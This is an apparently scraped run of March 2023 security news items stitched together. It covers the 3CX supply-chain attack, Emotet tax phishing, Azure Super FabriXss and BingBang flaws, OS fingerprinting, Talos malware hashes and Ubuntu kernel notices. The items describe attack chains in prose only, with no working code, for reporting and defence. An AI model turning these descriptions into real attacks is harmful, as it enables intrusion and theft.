In a Solar Winds-like attack, compromised, digitally signed versions of 3CX DesktopApp are landing on user systems via the vendor's update mechanism.

Security researchers are sounding the alarm on what may well be another major SolarWinds or Kaseya-like supply chain attack, this time involving Windows and Mac versions of a widely used video conferencing, PBX, and business communication app from 3CX.

On March 30, multiple security vendors said they had observed legitimate, digitally signed versions of the 3CX DesktopApp bundled with malicious installers landing on user desktops via the company's official automatic update process, as well as via manual updates. The end result is a data-stealing malware being implanted as part of a likely cyber-espionage effort by an advanced persistent threat (APT) actor.

The potential impact of the new threat could be huge. 3CX claims some 600,000 installations worldwide with over 12 million daily users. Among its numerous big-name customers are companies like American Express, Avis, Coca Cola, Honda, McDonald's, Pepsi, and Toyota.

CrowdStrike assessed that the threat actor behind the campaign is Labyrinth Chollima, a group that many researchers believe is linked with the cyber-warfare unit of North Korea's intelligence agency, the Reconnaissance General Bureau (RGB). Labyrinth Chollima is one of four groups that CrowdStrike has assessed are part of North Korea's larger Lazarus Group.

The threat is still very much an active one. "Currently, the very latest installers and updates available on the public 3CX website are still the compromised and backdoored applications that are noted as known bad by numerous security firms," says John Hammond, senior security researcher at Huntress.

**Enterprise App Trojanized With Malicious Installers**

The weaponized app arrives on a host system when the 3CX Desktop Application automatically updates, or when a user grabs the latest version proactively. Once pushed to a system, the signed 3CX DesktopApp executes a malicious installer, which then beacons out to an attacker-controlled server, pulls down a second-stage, information-stealing malware from there, and installs it on the user's computer. CrowdStrike, one of the first to report on the threat on March 29, said in a few instances it had also observed malicious hands-on-keyboard activity on systems with the Trojanized 3CX app.

In a message early on March 30, 3CX CEO Nick Galea urged users to immediately uninstall the app, adding that Microsoft Windows Defender would do that automatically for users running the software. Galea urged customers that want the app's functionality to use the Web client version of the technology while the company works on delivering an update.

A security alert from 3CX CISO Pierre Jourdan identified the affected apps as Electron Windows App, shipped in Update 7, version numbers 18.12.407 & 18.12.416 and Electron Mac App version numbers 18.11.1213, 18.12.402, 18.12.407, & 18.12.416. "The issue appears to be one of the bundled libraries that we compiled into the Windows Electron App via GIT," Jourdan said.

**Attackers Likely Breached 3CX's Production Environment**

Neither Jourdan nor Galea's messages gave any indication of how the attacker managed to gain the access they needed to trojanize a signed 3CXDekstopApp.exe binary. But at least two security vendors that have analyzed the threat say it could have only happened if the attackers were in 3CX's development or build environment — in the same manner that SolarWinds was compromised.

"Although only 3CX has the complete picture of what happened, so far, from the forensics, we assess with high confidence that the threat actor had access to the production pipeline of 3CX," says Lotem Finkelstein, director of threat intelligence & research at Check Point Software. "The files are signed with 3CX certificates, the same as used for the previous benign versions. The code is built in a way that it keeps working as it normally should but also adds some malware."

Finkelstein says Check Point's investigation confirms that the Trojanized version of the 3CX DesktopApp is being delivered through either manual download or regular updates from the official system.

Dick O'Brien, principal intelligent analyst at Symantec Threat Hunter team, says the threat actor does not appear to have touched the main executable itself. Instead, the APT compromised two dynamic link libraries (DLLs) that were delivered along with the executable in the installer. 

"One DLL was replaced with a completely different file with the same name," O'Brien says. "The second was a Trojanized version of the legitimate DLL \[with\] the attackers essentially appending it with additional encrypted data." The attackers have used a technique, known as DLL sideloading, to trick the legitimate 3CX binary to load and execute the malicious DLL, he says.

O'Brien agrees that the attacker would have needed access to 3CX's production environment to pull off the hack. "How they did that remains unknown. But once they had access to the build environment, all they had to do was drop two DLLs into the build directory."

**Potentially Broad Impact**

Researchers at Huntress tracking the threat said they had so far sent out a total of 2,595 incident reports to customers warning them of hosts running susceptible versions of the 3CX desktop application. In these instances, the software matched the hash or identifier for one of the known bad applications. 

"The final stage of the attack chain as we know it is reaching out to the command-and-control servers, however, this appears to be on a set timer after seven days," says Huntress' Hammond. A Shodan search that Huntress conducted showed 242,519 publicly exposed 3CX systems, though the issue's impact is broader than just that set of targets.

"The updates received by the signed 3CX Desktop Application are coming from the legitimate 3CX update source, so at first blush, this looks normal," he adds. "Many end users did not expect the original and valid 3CX application to suddenly be setting off alarm bells from their antivirus or security products, and in the early timeline where there was not much information uncovered, and there was some confusion over whether the activity was malicious or not, he says.

**Shades of SolarWinds & Kaseya**

Hammond compares this incident to the breaches at SolarWinds and at Kaseya. 

With SolarWinds, attackers — likely linked with Russia's Foreign Intelligence Service — broke into the company's build environment and inserted a few lines of malicious code into updates for its Orion network management software. Some 18,000 customers received the updates, but the threat actor was really targeting only a small handful of them for subsequent compromise. 

The attack on Kaseya's VSA remote management technology resulted in more than 1,000 downstream customers of its managed service provider customers being impacted and subsequently targeted for ransomware delivery. The two attacks are examples of a growing trend of threat actors targeting trusted software providers and entities in the software supply chain to reach a broad set of victims. Concerns over the threat prompted President Biden to issue an executive order in May 2021 that contained specific requirements for bolstering supply chain security.

Automatic Updates Deliver Malicious 3CX 'Upgrades' to Enterprises

By Waqas
Researchers have warned users to be on alert, as the IRS never sends emails to confirm taxpayers' personal information.
This is a post from HackRead.com Read the original post: IRS tax forms W-9 email scam drops Emotet malware

Emotet malware is known for stealing personal data and financial details from a targeted device.

The cybersecurity researchers at Malwarebytes have warned taxpayers about a new IRS tax email scam that delivers **Emotet malware**, a notorious banking Trojan that steals sensitive financial information from victims’ computers.

According to the researchers, the fraudulent emails appear to be sent from the agency and contain a subject line such as **IRS Tax Form W-9.** The message simply asks the recipient if they require a hard copy of the tax form, stating, “Let me know if you would like a hard copy mailed as well.”

The malicious email (Credit: Malwarebytes)

However, the attachment is actually a malicious payload that installs the Emotet malware onto the victim’s device if Marcos is enabled. Once the malware is installed, it can steal sensitive information such as login credentials, financial data, and personally identifiable information.

Moreover, the malicious Microsoft Word document is 500MB in size, which alone should stand as the biggest indicator that something is wrong with the downloaded file.

It is also worth noting that users should also beware of emails that contain subject lines like “Tax Payment Request” or “Automatic Income Tax Reminder” which instruct the recipient to download a Microsoft document file to review and confirm their personal details.

The latest IRS tax malspam scam should not come as a surprise, as malicious Microsoft document files were found to be responsible for **43% of all malware downloads** in 2021.

The Emotet malware has been active since 2014 and is known for its ability to evade detection and spread rapidly. It has been used to distribute other malware strains such as **TrickBot** and **Ryuk ransomware**, which have caused significant damage to organizations around the world.

The researchers **advise** taxpayers to be cautious of unsolicited emails, especially those that request personal information or contain suspicious links or attachments. On the other hand, the IRS recommends that recipients do not click on any links or download any attachments in such emails, and instead forward them to the IRS at **phishing@irs.gov**.

The IRS has reminded taxpayers that it does not initiate contact with taxpayers via email, text messages, or social media channels. The agency only communicates with taxpayers through traditional mail delivered by the United States Postal Service, or through secure online accounts on its official website, IRS.gov.

Taxpayers who have clicked on a link or downloaded an attachment from a suspicious email should immediately contact their IT department or a reputable cybersecurity firm for assistance. They should also file a complaint with the FBI’s Internet Crime Complaint Center (IC3) at **www.ic3.gov**.

1.  PayPal Notifies 35,000 Users of Data Breach
2.  Ransomware Email Scam Using FBI and IRS as Bait
3.  Hackers Hit IRS, Stopped Before Anything was Taken
4.  Data Breach Rattles IRS, 334k Tax Payers Data Stolen
5.  Users hit by ransomware via fake IRS tax return emails

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

IRS tax forms W-9 email scam drops Emotet malware

Red Gate SQL Monitor 11.0.14 through 12.1.46 has Incorrect Access Control, exploitable remotely for Escalation of Privileges.

Our solutions make life easier for development, operations, and IT leaders by **solving the database challenges** in delivering software at speed.

**Redgate helps teams balance the demand to deliver software fast with the need to protect and preserve business critical data.**

Your business, teams, and databases benefit from fast delivery, low downtime, and strong collaboration, while minimizing any risks to your data.

*   Request a demo
*   Discover more

**Discover how Compliant Database DevOps empowers your team**

Request a demo

**Solutions for every stage in your Compliant Database DevOps journey**

** Standardize team-based development**

Prevent rework and conflicts, build consistency and quality into your code, and gain time for development that adds value, with standardized best practices for database development.

**Learn more**

** Automate database deployments**

Unlock agility and performance across the full software lifecycle, with database continuous integration, continuous delivery, and shift-left testing that let you rapidly respond to user requirements.

**Learn more**

** Monitor performance and availability**

Avoid performance issues, minimize downtime, and support efficient recovery with proactive visibility and insight into your database estate.

**Learn more**

** Protect and preserve data**

Decrease the risk of breaches, protect business critical data, and meet compliance requirements while supporting data demands from developers and testers.

**Learn more**

Discover more

> “We've freed up the DBA team by 70-80%. That's the ROI, and the leadership team can understand that too.”

> “Code goes from months to deploy, to days. When we want to bring out new functionality for the customer, we can do it really quick. That's the real benefit.”

> “We knew the investment made sense and we were going to recover the cost fast. The best proof is that all the developers love Redgate's solution and use it on a daily basis. It's become a standard part of our development process.”

> “We were doing one database update a week, which took almost a full day. Now it takes ten minutes. We've automated 90% of the process, and we can now scale our application to more servers and markets without increasing our overhead.”

> “Redgate has helped LumiData deliver a foolproof development cycle rivaling that of any company, Microsoft included. We can now have major database revisions or releases out in minutes and distributed to all of our clients' databases.”

**Case studies**

See how our customers are benefiting from fast delivery, low downtime, and strong collaboration

**Get started with Compliant Database DevOps**

*   Request a demo
*   Discover more

20 years

as industry leader in database solutions

91% of the Fortune 100

use Redgate's software

800,000 users

rely on Redgate worldwide

**Can't find what you're looking for?**

CVE-2022-47542: Redgate Software - Compliant Database DevOps Solutions and Tools For SQL Server, Oracle, & .NET

Network protocols can be used to identify operating systems and discern other device information.

Network security and asset management products have to be able to identify what operating systems are currently running in the organization. With this information, IT and security departments gain greater visibility and control over their networks.

Device and operating system information is trivial to collect if the device has a software agent installed. However, agents are not an option for some operating systems, especially those installed on embedded and Internet of Things devices. This is where passive OS fingerprinting comes in handy, since passive methods don't require installing software on devices and work for most operating systems. Passive OS fingerprinting involves matching uniquely identifying patterns in the host's network traffic and classifying the traffic accordingly. Several protocols from different network layers can be used for OS fingerprinting: MAC addresses, TCP/IP parameters, HTTP User-Agent strings, and DHCP requests.

The Open Systems Interconnection (OSI) model contains several protocols for the application, transport, network, and data link layers. As a rule of thumb, protocols at the lower levels of the OSI stack — such as MAC and IP — provide better reliability with lower granularity compared with those on the upper levels of stack, and vice versa. Let's start at the bottom of the stack and move up.

**Start at the MAC Address**

The medium access control (MAC) protocol uses a unique physical identifier hardcoded into the device during manufacturing. The 12-digit hexadecimal number — the MAC address — is commonly written out as six pairs divided by hyphens. The left most six-digit long string represents the manufacturer's unique identifier and the right most six represent the serial number of the device's network interface card. For example, the six left-most digits of a MacBook laptop's MAC address would be 88:66:5a, which is the string affiliated with Apple.

By looking at the manufacturer's unique identifier, network administrators can infer the type of device running in the network and, in some cases, even the operating system.

**TCP/IP Tells Tales**

The TCP/IP stack is a more granular source of information. Most operating systems set unique values in the parameters within the packet headers, making it possible to identify the OS by looking at these values. Some of the most common parameters used in OS fingerprinting are initial time to live (TTL), Windows Size, "Don't Fragment" flag, and TCP options (values and order). For example, if a device has an outgoing packet's IP header with the "Don't fragment" flag set, TTL with the value of 64, Windows size of 65535, and a specific set of TCP options (02, 01, 03, 01, 01, 08, 04, 00), that's enough to identify it as running MacOS.

**HTTP Has a Wealth of Info**

Several protocols in the application layer are also useful for identifying the device's operating system type and the exact version or distribution. In some cases, these fields can be configured by the user and, thus, are less reliable.

The most common application protocol used in OS fingerprinting is HTTP, via the header's User-Agent field. The field, added by the application (such as a Web browser), includes information such as the application, operating system, and underlying device of the client. For example, the HTTP request to the server could contain a User-Agent field that identifies the client as a Firefox browser running on a Windows 7 OS: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0.

The User-Agent field is not the only indicator the HTTP protocol contains. Most operating systems have a built-in connectivity test that automatically runs when the device connects to a public network. For example, Network Connectivity Status Indicator (NCSI), an Internet connection awareness protocol in Microsoft's Windows operating systems, consists of a sequence of specifically crafted DNS and HTTP requests and responses that indicate if the host is located behind a captive portal or a proxy server.

**DHCP Identifies Hosts**

The DHCP protocol, used for IP assignment over the network, provides several indicators that can be used to identify the host. DHCP is composed of 4 steps: discovery, offer, request, and acknowledge (DORA). For example, a Windows host broadcasting DHCP messages over the local network and receiving replies from the DHCP server will be sending a unique vendor class identifier "MSFT 5.0," and the parameter request list would contain a sequence of values common to Windows hosts.

Combined with the order of the DHCP options themselves, the indicators are sufficient to identify the host as a Windows OS.

**Wrapping Up**

While some protocols provide better accuracy than others, there is no "silver bullet" for the task of OS identification, and the different options provide different types of information. Rather than fingerprinting based on a single protocol, you might consider a multiprotocol approach, such as combining the HTTP User-Agent with lower-level TCP options.

How to Solve IoT's Identity Problem

The vulnerability would have allowed an unauthenticated attacker to execute code on a container hosted on one of the platform's nodes.

Microsoft has patched what researchers called a "dangerous" flaw in its Azure Service Fabric component of the company's cloud-hosting infrastructure. If exploited, it would have allowed an unauthenticated, malicious actor to execute code on a container hosted on the platform.

Researchers from Orca Security discovered the cross-site scripting (XSS) flaw — which they dubbed Super FabriXss — in December and reported it to Microsoft, which issued a fix for it in March's round of Patch Tuesday updates, the researchers said in a blog post published March 30, revealing the technical details of the bug.

They also demonstrated how attackers can take advantage of the flaw — which makes Azure Service Fabric Explorer versions 9.1.1436.9590 or earlier vulnerable to exploit — in a presentation at Microsoft's BlueHat IL 2023 in Tel Aviv today. 

Super FabriXss, tracked as CVE-2023-23383 with a CVSS rating of 8.2, is the second XSS flaw so far that Orca researchers discovered in Azure Service Fabric Explorer. Part of Microsoft's Azure cloud computing platform, Azure Service enables packaging, deployment, and management of stateless and stateful microservices and containers on large-scale distributed systems.

The first XSS vulnerability, dubbed FabriXss and detailed by Orca researchers in October, did not pose as severe a risk as its successor, the researchers said. FabriXss, also patched quickly by Microsoft in a Patch Tuesday update, would have allowed an attacker to gain full administrator permissions on the Service Fabric cluster.

**Exploiting Super FabriXss**

With Super FabriXss, a remote unauthenticated attacker can execute code on a container hosted on one of the Service Fabric nodes, which "means that an attacker could potentially gain control of critical systems and cause significant damage," Lidor Ben Shitrit, cloud security researcher at Orca Security, wrote in the post.

Using Super FabriXss, an attacker could craft a malicious URL that, when clicked, initiates a multi-step process eventually leading to the creation and deployment of a harmful container on one of the cluster nodes, Shitrit tells Dark Reading.

Specifically, researchers demonstrated at BlueHat how they could escalate a reflected XSS vulnerability in Azure Service Fabric Explorer to an unauthenticated RCE by abusing the metrics tab and enabling a specific option in the console: the "Cluster Type" toggle, Shitrit wrote in the post.

"To exploit this vulnerability, a victim (an authenticated Service Fabric Explorer user) must first click on the malicious URL and then be guided to click on the Cluster Type under the Events tab," he explains to Dark Reading. "Once exploited, sensitive cluster data could be revealed to the attacker, potentially allowing them to expand the attack to a larger surface."

The vulnerability itself arises from a vulnerable "Node Name" parameter, which can be exploited to embed an iframe in the user's context, Shitrit said in the post. This iframe then retrieves remote files from a server controlled by the attacker, eventually leading to the execution of a malicious PowerShell reverse shell.

"This attack chain can ultimately result in remote code execution on the container \[that\] is deployed to the cluster, potentially allowing an attacker to take control of critical systems," he wrote.

**Mitigation & Implications for Azure Users**

Orca reported the vulnerability to the Microsoft Security Response Center (MSRC) on Dec. 20, and an investigation into the issue begun later that month, on Dec. 31, the researchers said. Orca researchers and MSRC communicated several times regarding the impact of the flaw before Microsoft assigned CVE-2023-23383 to the vulnerability and issued a patch for it on March 14 that automatically fixed the issue for customers.

While no further action is necessary by Azure Service Fabric users, the flaw does, once again, highlight the inherent danger of unpatched flaws in cloud-based architectures that an enterprise deploys, he tells Dark Reading. These vulnerabilities "can pose higher risks compared to on-premises solutions," Shitrit says.

"With cloud-based systems, organizations often depend on third-party providers, leading to a larger attack surface and less control over security measures," he adds. "Additionally, it's important to consider the multi-tenant nature of cloud environments and the significance of maintaining proper isolation between tenants."

To address risks posed by cloud-based flaws like Super FabriXss, he suggests that organizations maintain a regime of cloud security hygiene. This includes regularly applying patches, monitoring security, addressing vulnerabilities, training employees on best practices, applying network segmentation, enforcing least-privilege permissions, collaborating with providers, and creating a robust incident response plan, Shitrit says.

"These combined efforts help ensure a secure and resilient cloud environment," he says.

Microsoft Patches 'Dangerous' RCE Flaw in Azure Cloud Service

Very few of us looking to buy these pieces of equipment are qualified to say if these products are even secure, and those among us who are are probably smart enough to know not to buy these products in the first place.

Thursday, March 30, 2023 14:03

Welcome to this week’s edition of the Threat Source newsletter.

Everyone loves a good video of someone slipping on their icy steps in the winter, captured thanks to their home security camera or smart doorbell. But what about when that camera is just kind of chilling out and not catching the moment your dog takes off after that squirrel?

The world of security cameras and recording devices attached to one’s home is becoming increasingly murky by the day. Law enforcement officials are finding ways to compel the companies that manufacture and manage these devices to turn over homeowners’ footage, even if the homeowner doesn’t consent to it.

And Amazon Ring, the biggest player in this space now, may or may not be the target of a ransomware attack.

So, while consumers might be purchasing these devices to ensure their physical security, the question about if these products are good for online security is a major question mark.

As Talos’ own Joe Marshall wrote in a guest column at Dark Reading this week, “IoT vendors continue to fail us on implementing solid cybersecurity controls.” This even goes for some of the largest tech companies in the world who would conceivably have the most money to invest in securing and testing these devices before they hit the market.

There are tons of budget options on the market that, unless you are an expert vulnerability researcher, are impossible to fully vet. I just went to Amazon’s website this week and searched for “smart doorbell.” Three of the best-selling items on the first page of results use nearly the exact same thumbnail art to advertise the product. Yet when you go to their product pages, each one is listed as being manufactured or sold by a different company.

If you’re merely reading the reviews of these products to figure out what’s right for you, or searching the internet for someone else’s review, they may mention if the resolution quality is up to snuff or if the app works well, but I doubt the reviewer has the time to physically tear apart the device looking for vulnerabilities or combing through the API for security holes. And if we can’t even trust the companies making these devices to differentiate their products based on appearance, there is no way to know how they may be prepared to respond to a data breach or what their stance is on sharing footage with law enforcement.

The same goes for security cameras. On Amazon’s search page for “home security camera,” the top five non-sponsored results are all made by different companies (Ring being one of them) and based on the features they offer, it’s nearly impossible to differentiate them outside of a difference in form factor. Very few of us looking to buy these pieces of equipment are qualified to say if these products are even secure, and those among us who are are probably smart enough to know not to buy these products in the first place.

I certainly wouldn’t stop anyone from buying a home security camera if they truly feel it improves their families’ safety. But I think that, no matter what brand we buy, everyone just needs to assume now that they’re taking a risk with their privacy and online security as a trade-off for catching possible package burglars.

**The one big thing**

Emotet is back from the dead once again. Since returning, Emotet has leveraged several distinct infection chains, indicating that they are modifying their approach based on their perceived success in infecting new systems. The initial emails delivered to victims are consistent with what has been observed from Emotet over the past several years.

Why do I care?

Emotet is arguably the most infamous botnet on the threat landscape, so it’s notable any time it spins back up. This network is known to go through quiet periods and then pop back up, so this isn’t particularly surprising, but it is noteworthy because Emotet’s creators are switching up their tactics by switching to new types of lure documents to evade detection and recent changes Microsoft made to macros to try and stop attackers from using malicious Office attachments.

**So now what?**

Because Emotet has been around for so long now, Cisco Secure and Talos have an exhaustive list of ways to stay protected from Emotet spam. But as a good general reminder, always make sure you triple-check the “From” field in an email to make sure it’s actually from who you think its from. And never open an attachment or click on a link in an email unless you’re sure it’s the correct destination.

**Top security headlines of the week**

**Defenders and detractors of TikTok both seem unmoved** after the popular social media app’s CEO testified in front of a U.S. Congressional panel last week. Lawmakers who are in favor of a blanket ban on the app in the U.S. over data and privacy concerns were unimpressed with the answers the company’s lead provided, while others mocked lawmakers for the types of questions they asked and instead advocated for broader data privacy laws. Republicans in Congress still plan to take up legislation to ban TikTok, with House Speaker Kevin McCarthy tweeting that, “It’s very concerning that the CEO of TikTok can’t be honest and admit what we already know to be true — China has access to TikTok user data.” (Buzzfeed, The Hill, The New Yorker)

**A bug in the popular ChatGPT AI tool exposed other users’ message history** and may have also leaked sensitive information like the payment information and emails of premium users. OpenAI, the company behind ChatGPT, took the tool offline last Tuesday for emergency maintenance after they became aware of the issue. The company confirmed the information was exposed during a nine-hour window on March 20, but it could have been exposed prior to that. The data leak exposes concerns that many users have around using tools like ChatGPT to share sensitive or potentially confidential information. (SecurityWeek, Engadget)

**A data breach at Latitude Financial affects millions of people in New Zealand and Australia,** potentially dating back to 2005. The personal lending company said attackers stole around 7.9 million driver’s license numbers and 53,000 passport numbers. Names, addresses, phone numbers and dates of birth are also among the data stolen. When Latitude first announced the attack on March 16, it estimated that 300,000 customers had been affected, but the number has grown as the investigation continued, though the company stopped the breach prior to the disclosure. The breach has called into question why financial companies retain records for so long after a customer has applied for financing and how that data is stored. (The Guardian, Yahoo Finance)

**Can’t get enough Talos?**

*   Talos Takes Ep. #132: Reflecting on one year of Talos' work in Ukraine
*   Graphic novel: Life inside the Talos Ukraine Task Unit
*   How an incident response retainer can drive proactive security
*   Threat Roundup for March 17 - 24
*   If your Netgear Orbi router isn’t patched, you’ll want to change that pronto

**Upcoming events where you can find Talos**

**RSA** **(April 24 - 27)**

San Francisco, CA

**Cisco Live U.S.** **(June 4 - 8)**

Las Vegas, NV

**Most prevalent malware files from Talos telemetry over the past week**

  
**SHA 256:** e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  
**MD5:** 93fefc3e88ffb78abb36365fa5cf857c  
**Typical Filename:** Wextract  
**Claimed Product:** Internet Explorer  
**Detection Name:** PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg

**SHA 256:** 00ab15b194cc1fc8e48e849ca9717c0700ef7ce2265511276f7015d7037d8725  
**MD5:** d47fa115154927113b05bd3c8a308201  
**Typical Filename:** mssqlsrv.exe  
**Claimed Product:** N/A  
**Detection Name:** Trojan.GenericKD.65065311

**SHA 256:** de3908adc431d1e66656199063acbb83f2b2bfc4d21f02076fe381bb97afc423  
**MD5:** 954a5fc664c23a7a97e09850accdfe8e  
**Typical Filename:** teams15.exe  
**Claimed Product:** teams15  
**Detection Name:** Gen:Variant.MSILHeracles.59885

**SHA 256:** c74e7421f2021b46ee256e5f02d94c1bce15da107c8c997c611055412de1ac1  
**MD5:** 2d16d0af6183803a79d9ef5c744286c4  
**Typical Filename:** nano\_download.php  
**Claimed Product:** Web Companion Installer  
**Detection Name:** W32.1C74E7421F-100.SBX.VIOC

**SHA 256:** 5616b94f1a40b49096e2f8f78d646891b45c649473a5b67b8beddac46ad398e1  
**MD5:** 3e10a74a7613d1cae4b9749d7ec93515  
**Typical Filename:** IMG001.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Coinminer::1201

Threat Source newsletter (March 30, 2023) — It’s impossible to tell if your home security camera or doorbell is truly safe

By Habiba Rashid
Cybersecurity researchers at Wiz reported the vulnerability to Microsoft and dubbed the attack "BingBang".
This is a post from HackRead.com Read the original post: Vulnerability Enabled Bing.com Takeover, Search Result Manipulation

The Wiz Research team was awarded $40,000 as a bug bounty by Microsoft for the responsible disclosure of the vulnerability.

Wiz Research identified a new attack vector in Azure Active Directory (AAD) that compromised Microsoft’s Bing.com. The vulnerability allowed unauthorized access to misconfigured applications, and several Microsoft applications, including the Content Management System (CMS), powering **Bing.com**.

Researchers were able to take over the functionality of Bing.com, modify search results, and potentially enable the Office 365 credential theft of millions of Bing users. Wiz Research named this attack “BingBang,” and it required no code to exploit.

How Bing.com search results were altered by researchers (Image credit: WIZ)

Microsoft fixed its vulnerable applications and modified some AAD functionality to reduce customer exposure after Wiz Research responsibly disclosed the issues. Microsoft awarded Wiz Research $40,000 as a **bug bounty**.

The researchers found that 25% of the multi-tenant apps scanned on the internet were vulnerable, including a Microsoft-made app named “Bing Trivia.” After logging into Bing Trivia with their own Azure user, they found a CMS linked to Bing.com.

In addition, they temporarily altered the content of a keyword in the CMS to prove that they could control arbitrary search results on Bing.com. If someone with malicious intentions accessed the Bing Trivia app page, they could alter search results, spread false information, and attempt to trick people into giving away their personal information by impersonating other websites.

The researchers further discovered that they could use Cross-Site Scripting (**XSS**) to compromise the Office 365 token of any Bing user. Bing and Office 365 are integrated, and Bing has a “Work” section that allows users to search their Office 365 data. Using this feature, the researchers crafted an XSS payload that stole Office 365 access tokens from users.

With a stolen token, a potential attacker could access Bing users’ Office 365 data, including Outlook emails, calendars, Teams messages, SharePoint documents, and OneDrive files. Millions of users could have been exposed to malicious search results and Office 365 data theft.

In a **report**, Wiz warned that any organization with Azure Active Directory (**AAD**) applications configured as multi-tenant and lacking authorization checks was at risk of similar attacks. Therefore, administrators are advised to ensure that multi-tenant access is properly configured or to switch to single-tenant authentication if multi-tenancy is not required. Checking logs for past activity in vulnerable applications is also recommended.

The vulnerability discovered in Bing.com serves as a reminder that a simple developer mistake can have critical implications, potentially disrupting one of the world’s most popular websites. The cloud’s flexibility of infrastructure accelerates innovation but also brings changes and new risks.

In this case, a user can accidentally expose a sensitive service to the internet with the click of a button. As cloud builders, the agility with which we develop and deploy applications should be matched by our security practices, and **security should be embedded** in every step of the development process.

1.  Microsoft leaked user data in BlueBleed breach
2.  Bing server exposed user searches, location data
3.  Microsoft Dynamics 365 user voice phishing is here
4.  Microsoft signed drivers let hackers breach security
5.  MS Office most exploited software in malware scams

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

Vulnerability Enabled Bing.com Takeover, Search Result Manipulation

Davide Ornaghi discovered that the netfilter subsystem in the Linux kernel did not properly handle VLAN headers in some situations. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. It was discovered that the Upper Level Protocol (ULP) subsystem in the Linux kernel did not properly handle sockets entering the LISTEN state in certain protocols, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code.

Linux kernel vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

-   Ubuntu 20.04 LTS  
-   Ubuntu 18.04 LTS  
-   Ubuntu 16.04 ESM  
-   Ubuntu 22.04 LTS

Summary

Several security issues were fixed in the kernel.

Software Description

-   linux - Linux kernel  
-   linux-aws - Linux kernel for Amazon Web Services (AWS) systems  
-   linux-azure - Linux kernel for Microsoft Azure Cloud systems  
-   linux-gcp - Linux kernel for Google Cloud Platform (GCP) systems  
-   linux-gke - Linux kernel for Google Container Engine (GKE) systems  
-   linux-gkeop - Linux kernel for Google Container Engine (GKE) systems  
-   linux-ibm - Linux kernel for IBM cloud systems  
-   linux-oem - Linux kernel for OEM systems

Details

Davide Ornaghi discovered that the netfilter subsystem in the Linux  
kernel did not properly handle VLAN headers in some situations. A local  
attacker could use this to cause a denial of service (system crash) or  
possibly execute arbitrary code. (CVE-2023-0179)

It was discovered that the Upper Level Protocol (ULP) subsystem in the  
Linux kernel did not properly handle sockets entering the LISTEN state  
in certain protocols, leading to a use-after-free vulnerability. A local  
attacker could use this to cause a denial of service (system crash) or  
possibly execute arbitrary code. (CVE-2023-0461)

Update instructions

The problem can be corrected by updating your kernel livepatch to the  
following versions:

Ubuntu 20.04 LTS  
    aws - 93.1  
    azure - 93.1  
    gcp - 93.1  
    gcp - 93.2  
    generic - 93.1  
    gke - 93.1  
    gke - 93.2  
    gkeop - 93.1  
    ibm - 93.1  
    lowlatency - 93.1

Ubuntu 18.04 LTS  
    aws - 93.1  
    azure - 93.1  
    gcp - 93.1  
    generic - 93.1  
    gke - 93.1  
    gkeop - 93.1  
    lowlatency - 93.1  
    oem - 93.1

Ubuntu 16.04 ESM  
    aws - 93.1  
    azure - 93.1  
    gcp - 93.1  
    generic - 93.1  
    lowlatency - 93.1

Ubuntu 22.04 LTS  
    aws - 93.1  
    azure - 93.1  
    gcp - 93.1  
    generic - 93.1  
    gke - 93.1  
    ibm - 93.1

Support Information

Kernels older than the levels listed below do not receive livepatch  
updates. If you are running a kernel version earlier than the one listed  
below, please upgrade your kernel as soon as possible.

Ubuntu 20.04 LTS  
    linux-aws-5.15 - 5.15.0-1000  
    linux-aws - 5.4.0-1009  
    linux-aws - 5.4.0-1061  
    linux-azure-5.15 - 5.15.0-1069  
    linux-azure - 5.4.0-1010  
    linux-gcp-5.15 - 5.15.0-1000  
    linux-gcp - 5.4.0-1009  
    linux-gke-5.15 - 5.15.0-1000  
    linux-gke - 5.4.0-1033  
    linux-gkeop - 5.4.0-1009  
    linux-hwe - 5.15.0-0  
    linux-ibm-5.15 - 5.15.0-1000  
    linux-ibm - 5.4.0-1009  
    linux-oem - 5.4.0-26  
    linux - 5.4.0-26

Ubuntu 18.04 LTS  
    linux-aws-5.4 - 5.4.0-1069  
    linux-aws - 4.15.0-1054  
    linux-aws - 4.15.0-1119  
    linux-azure-4.15 - 4.15.0-1115  
    linux-azure-5.4 - 5.4.0-1069  
    linux-gcp-4.15 - 4.15.0-1121  
    linux-gcp-5.4 - 5.4.0-1069  
    linux-gke-4.15 - 4.15.0-1076  
    linux-gke-5.4 - 5.4.0-1009  
    linux-gkeop-5.4 - 5.4.0-1007  
    linux-hwe-5.4 - 5.4.0-26  
    linux-ibm-5.4 - 5.4.0-1009  
    linux-oem - 4.15.0-1063  
    linux - 4.15.0-69

Ubuntu 16.04 ESM  
    linux-aws-hwe - 4.15.0-1126  
    linux-aws - 4.4.0-1098  
    linux-aws - 4.4.0-1129  
    linux-azure - 4.15.0-1063  
    linux-azure - 4.15.0-1078  
    linux-azure - 4.15.0-1114  
    linux-gcp - 4.15.0-1118  
    linux-hwe - 4.15.0-143  
    linux-hwe - 4.15.0-69  
    linux - 4.4.0-168  
    linux - 4.4.0-211

Ubuntu 22.04 LTS  
    linux-aws - 5.15.0-1000  
    linux-azure - 5.15.0-1000  
    linux-gcp - 5.15.0-1000  
    linux-gke - 5.15.0-1000  
    linux-ibm - 5.15.0-1000  
    linux - 5.15.0-24  
    linux - 5.15.0-25

Ubuntu 14.04 ESM  
    linux-lts-xenial - 4.4.0-168

References

-   CVE-2023-0179  
-   CVE-2023-0461

Kernel Live Patch Security Notice LNS-0093-1

Ubuntu Security Notice 5985-1 - It was discovered that the System V IPC implementation in the Linux kernel did not properly handle large shared memory counts. A local attacker could use this to cause a denial of service. It was discovered that the KVM VMX implementation in the Linux kernel did not properly handle indirect branch prediction isolation between L1 and L2 VMs. An attacker in a guest VM could use this to expose sensitive information from the host OS or other guest VMs.

